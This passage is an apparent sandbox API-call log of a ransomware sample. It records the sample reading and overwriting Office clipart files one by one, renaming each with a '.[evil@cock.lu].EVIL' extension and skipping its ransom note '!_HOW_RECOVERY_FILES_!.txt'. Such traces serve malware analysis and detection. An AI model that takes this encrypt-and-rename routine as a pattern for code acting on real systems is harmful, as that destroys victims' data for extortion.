0x1a8 [0168.253] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7a80, lpOverlapped=0x0) returned 1 [0168.260] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.260] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.260] _errno () returned 0x84b1160840 [0168.261] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.261] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x7aa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7aa0, lpOverlapped=0x0) returned 1 [0168.261] CloseHandle (hObject=0x1a8) returned 1 [0168.261] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00152_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.261] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.261] __uncaught_exception () returned 0x84b1160800 [0168.261] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.261] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00152_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00152_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00152_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00152_.wmf.[evil@cock.lu].evil")) returned 1 [0168.262] ??_V@YAXPEAX@Z () returned 0x1 [0168.265] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00152_.WMF", dwFileAttributes=0x200) returned 0 [0168.265] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.265] wcsstr (_Str="SO00157_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.265] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00157_.WMF") returned 69 [0168.265] wcscmp (_String1="SO00157_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.265] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00157_.WMF") returned 0x0 [0168.265] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00157_.WMF") returned 0x45 [0168.265] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00157_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.309] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4754, lpOverlapped=0x0) returned 1 [0168.320] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.320] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.320] _errno () returned 0x84b1160840 [0168.320] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.320] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4760, lpOverlapped=0x0) returned 1 [0168.320] CloseHandle (hObject=0x1a8) returned 1 [0168.320] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00157_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.320] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.321] __uncaught_exception () returned 0x84b1160800 [0168.321] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.321] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00157_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00157_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00157_.wmf.[evil@cock.lu].evil")) returned 1 [0168.322] ??_V@YAXPEAX@Z () returned 0x1 [0168.325] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00157_.WMF", dwFileAttributes=0x200) returned 0 [0168.325] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.325] wcsstr (_Str="SO00159_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.326] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00159_.WMF") returned 69 [0168.326] wcscmp (_String1="SO00159_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.326] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00159_.WMF") returned 0x0 [0168.326] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00159_.WMF") returned 0x45 [0168.326] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00159_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00159_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.328] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2026, lpOverlapped=0x0) returned 1 [0168.338] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.338] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.338] _errno () returned 0x84b1160840 [0168.338] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.338] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2040, lpOverlapped=0x0) returned 1 [0168.339] CloseHandle (hObject=0x1a8) returned 1 [0168.339] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00159_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.339] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.339] __uncaught_exception () returned 0x84b1160800 [0168.339] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.339] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00159_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00159_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00159_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00159_.wmf.[evil@cock.lu].evil")) returned 1 [0168.341] ??_V@YAXPEAX@Z () returned 0x1 [0168.344] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00159_.WMF", dwFileAttributes=0x200) returned 0 [0168.344] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.344] wcsstr (_Str="SO00166_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.344] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00166_.WMF") returned 69 [0168.344] wcscmp (_String1="SO00166_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.344] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00166_.WMF") returned 0x0 [0168.344] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00166_.WMF") returned 0x45 [0168.344] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00166_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.347] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x35b2, lpOverlapped=0x0) returned 1 [0168.356] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.356] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.356] _errno () returned 0x84b1160840 [0168.356] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.356] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x35c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x35c0, lpOverlapped=0x0) returned 1 [0168.356] CloseHandle (hObject=0x1a8) returned 1 [0168.356] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00166_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.357] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.357] __uncaught_exception () returned 0x84b1160800 [0168.357] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.357] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00166_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00166_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00166_.wmf.[evil@cock.lu].evil")) returned 1 [0168.358] ??_V@YAXPEAX@Z () returned 0x1 [0168.365] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00166_.WMF", dwFileAttributes=0x200) returned 0 [0168.365] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.365] wcsstr (_Str="SO00168_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.365] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00168_.WMF") returned 69 [0168.365] wcscmp (_String1="SO00168_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.365] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00168_.WMF") returned 0x0 [0168.365] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00168_.WMF") returned 0x45 [0168.365] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00168_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00168_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.368] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3b2e, lpOverlapped=0x0) returned 1 [0168.378] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.378] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.378] _errno () returned 0x84b1160840 [0168.378] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.378] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x3b40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3b40, lpOverlapped=0x0) returned 1 [0168.378] CloseHandle (hObject=0x1a8) returned 1 [0168.378] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00168_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.379] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.379] __uncaught_exception () returned 0x84b1160800 [0168.379] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.379] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00168_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00168_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00168_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00168_.wmf.[evil@cock.lu].evil")) returned 1 [0168.381] ??_V@YAXPEAX@Z () returned 0x1 [0168.384] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00168_.WMF", dwFileAttributes=0x200) returned 0 [0168.385] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.385] wcsstr (_Str="SO00170_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.385] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00170_.WMF") returned 69 [0168.385] wcscmp (_String1="SO00170_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.385] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00170_.WMF") returned 0x0 [0168.385] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00170_.WMF") returned 0x45 [0168.385] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00170_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.391] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2242, lpOverlapped=0x0) returned 1 [0168.670] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.670] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.670] _errno () returned 0x84b1160840 [0168.670] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.670] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2260, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2260, lpOverlapped=0x0) returned 1 [0168.670] CloseHandle (hObject=0x1a8) returned 1 [0168.670] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00170_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.670] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.671] __uncaught_exception () returned 0x84b1160800 [0168.671] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.671] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00170_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00170_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00170_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00170_.wmf.[evil@cock.lu].evil")) returned 1 [0168.672] ??_V@YAXPEAX@Z () returned 0x1 [0168.674] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00170_.WMF", dwFileAttributes=0x200) returned 0 [0168.675] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.675] wcsstr (_Str="SO00177_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.675] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00177_.WMF") returned 69 [0168.675] wcscmp (_String1="SO00177_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.675] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00177_.WMF") returned 0x0 [0168.675] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00177_.WMF") returned 0x45 [0168.675] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00177_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00177_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.677] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8f0e, lpOverlapped=0x0) returned 1 [0168.679] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.679] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.679] _errno () returned 0x84b1160840 [0168.679] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.679] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x8f20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8f20, lpOverlapped=0x0) returned 1 [0168.680] CloseHandle (hObject=0x1a8) returned 1 [0168.680] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00177_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.680] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.680] __uncaught_exception () returned 0x84b1160800 [0168.680] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.680] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00177_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00177_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00177_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00177_.wmf.[evil@cock.lu].evil")) returned 1 [0168.681] ??_V@YAXPEAX@Z () returned 0x1 [0168.684] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00177_.WMF", dwFileAttributes=0x200) returned 0 [0168.684] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.684] wcsstr (_Str="SO00183_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.684] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00183_.WMF") returned 69 [0168.684] wcscmp (_String1="SO00183_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.684] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00183_.WMF") returned 0x0 [0168.684] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00183_.WMF") returned 0x45 [0168.684] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00183_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00183_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.686] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x283c, lpOverlapped=0x0) returned 1 [0168.689] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.689] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.689] _errno () returned 0x84b1160840 [0168.689] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.689] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x2840, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2840, lpOverlapped=0x0) returned 1 [0168.689] CloseHandle (hObject=0x1a8) returned 1 [0168.689] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00183_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.689] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.689] __uncaught_exception () returned 0x84b1160800 [0168.689] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.690] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00183_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00183_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00183_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00183_.wmf.[evil@cock.lu].evil")) returned 1 [0168.690] ??_V@YAXPEAX@Z () returned 0x1 [0168.693] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00183_.WMF", dwFileAttributes=0x200) returned 0 [0168.693] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.693] wcsstr (_Str="SO00190_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.693] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00190_.WMF") returned 69 [0168.693] wcscmp (_String1="SO00190_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.693] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SO00190_.WMF") returned 0x0 [0168.693] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00190_.WMF") returned 0x45 [0168.694] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00190_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00190_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0168.695] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x514c, lpOverlapped=0x0) returned 1 [0168.699] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.699] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.699] _errno () returned 